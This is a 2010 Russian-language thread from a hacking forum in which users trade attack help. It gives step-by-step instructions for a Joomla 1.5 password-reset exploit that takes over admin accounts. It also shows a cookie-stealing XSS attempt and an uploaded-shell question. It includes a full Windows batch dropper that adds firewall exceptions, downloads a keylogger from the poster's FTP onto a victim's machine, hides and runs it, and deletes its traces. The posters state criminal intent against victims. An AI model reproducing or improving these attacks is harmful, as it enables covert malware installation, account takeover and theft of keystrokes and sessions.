HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15821  
Старый 11.12.2010, 19:44
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

так в этом и проблема....кавычки. не если нет прав ладно. спасибо!
 
Ответить с цитированием

  #15822  
Старый 12.12.2010, 05:13
wizzardl
Новичок
Регистрация: 13.05.2010
Сообщений: 0
Провел на форуме:
1205

Репутация: 0
По умолчанию

joomla 1.5 exploit

1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

во время входа мне выдает ошибку неверный логин ???
 
Ответить с цитированием

  #15823  
Старый 12.12.2010, 05:17
Mirrey
Guest
Сообщений: n/a
Провел на форуме:
8054

Репутация: 0
По умолчанию

Нашел xss, выполняю:

Цитата:
Сообщение от None  
alert(document.cookie)
В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?
 
Ответить с цитированием

  #15824  
Старый 12.12.2010, 11:13
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Mirrey  
Mirrey said:
Нашел xss, выполняю:
В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?
Наверное, некоторые куки недоступны для javascriptа, то есть они с флагом HTTP-Only
 
Ответить с цитированием

  #15825  
Старый 12.12.2010, 11:26
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию

Цитата:
Сообщение от wizzardl  
wizzardl said:
joomla 1.5 exploit
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
во время входа мне выдает ошибку неверный логин ???
Значит уязвимость исправлена.
 
Ответить с цитированием

  #15826  
Старый 12.12.2010, 16:19
Darklamar
Guest
Сообщений: n/a
Провел на форуме:
1838

Репутация: 0
По умолчанию

Столкнулся с такой проблемой. Создал батник install.bat

Код:
Code:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП" 
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable 
attrib "C:\hc" +h 
start C:\hc\inst_jasp.exe 
del key.txt 
del install.bat
Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(

Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.
 
Ответить с цитированием

  #15827  
Старый 12.12.2010, 16:31
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Darklamar  
Darklamar said:
Столкнулся с такой проблемой. Создал батник install.bat
Код:
Code:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП" 
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable 
attrib "C:\hc" +h 
start C:\hc\inst_jasp.exe 
del key.txt 
del install.bat
Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.
ANTIVIRUS+FIREWALL
 
Ответить с цитированием

  #15828  
Старый 12.12.2010, 16:34
Darklamar
Guest
Сообщений: n/a
Провел на форуме:
1838

Репутация: 0
По умолчанию

Антивира у него нету, фаерволла тоже (кроме стандартного, но в батнике просаны исключения)
 
Ответить с цитированием

  #15829  
Старый 12.12.2010, 19:03
MikePro
Новичок
Регистрация: 30.01.2010
Сообщений: 0
Провел на форуме:
14728

Репутация: 0
По умолчанию

Подскажите пожалуйста как создать shell и как им пользоватся
 
Ответить с цитированием

  #15830  
Старый 12.12.2010, 19:07
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от MikePro  
MikePro said:
Подскажите пожалуйста как создать shell и как им пользоватся
ну дорогой задал ты вопрос, шелл что бы создать надо в пхп или в другом веб языке шарить, но я подозреваю что тебя интересует как залить шелл (аплоад на сервер)..для этого прочитай -ка сначала все маны по багам на ачате, но остановись на скулях поболее.и через пару эдак месяцев если понятливый будешь , то узнаешь что такое шелл и с чем его едят..а пока кури маны..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ